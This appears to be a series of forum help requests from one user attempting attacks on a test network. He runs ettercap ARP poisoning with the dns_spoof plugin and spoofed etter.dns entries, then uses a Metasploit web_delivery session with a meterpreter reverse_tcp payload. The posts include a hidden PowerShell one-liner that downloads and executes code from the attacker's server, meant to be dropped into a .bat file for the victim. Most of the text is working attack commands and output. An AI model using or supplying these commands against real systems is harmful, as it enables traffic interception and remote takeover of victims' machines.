pierre

The command works with ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2// Here is how I've done : I try to redirect a victim to my own apache web server when he is on a particular URL. First I have a look at etter.dns : root@osboxes:~# vim /etc/ettercap/etter.dns # microsoft sucks ;) # redirect it to www.linux.org # microsoft.com A 192.168.0.1 *.microsoft.com A 192.168.0.1 www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allowed So the victim be spoof by going on microsoft.com I can ping my victim : root@osboxes:~# ifconfig eth0 192.168.0.1/24 root@osboxes:~# ping 192.168.0.2 PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data. 64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.808 ms 64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.639 ms ^C --- 192.168.0.2 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1000ms rtt min/avg/max/mdev = 0.639/0.723/0.808/0.088 ms I active webserver : root@osboxes:~# service apache2 start So now I enter this command : ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2// ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Listening on: eth0 -> 08:00:27:1D:EC:A2 192.168.0.1/255.255.255.0 fe80::a00:27ff:fe1d:eca2/64 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0. Privileges dropped to EUID 65534 EGID 65534... 33 plugins 42 protocol dissectors 57 ports monitored 20388 mac vendor fingerprint 1766 tcp OS fingerprint 2182 known services Lua: no scripts were specified, not starting up! Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % Scanning for merged targets (1 hosts)... * |==================================================>| 100.00 % 3 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.0.2 08:00:27:3B:98:9D GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Activating dns_spoof plugin... But unfortunately, victim can access to microsoft.com , nothing is spoof... PS : My victim have access to my webserver by hitting @IP in URL of it browser

hello, I try to use the plugin dns_spoof on a victim machine. However, an errors appears ... root@osboxes:~# ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.2.// ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team TARGET (–i) contains invalid chars ! The parameter " -i " requires an interface value so what's wrong ?? PS : I can do the classic MITM with the graphical interface.

Sorry, I misunderstand what I was doing. I woukd have create a file .bat and paste the line : "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:8080/uochXT'))" :)

Hello, I want the victim to download a webshell by connecting on my apache webserver. Everythings seems well but when I create the webshell, I don't know where it is ..... Look : msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(web_delivery) > show options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none) LHOST 192.168.0.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 PSH msf exploit(web_delivery) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.1:4444 [*] Using URL: http://0.0.0.0:8080/6PXdn4l [*] Local IP: http://127.0.0.1:8080/6PXdn4l [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:8080/6PXdn4l')) msf exploit(web_delivery) > [*] 192.168.0.2 web_delivery - Delivering Payload After I have to put the webshell at /var/www/html on my attack computer but I can't find it..... root@osboxes:/# locate powershell.exe root@osboxes:/# Nothing return.... Have you got solutions ??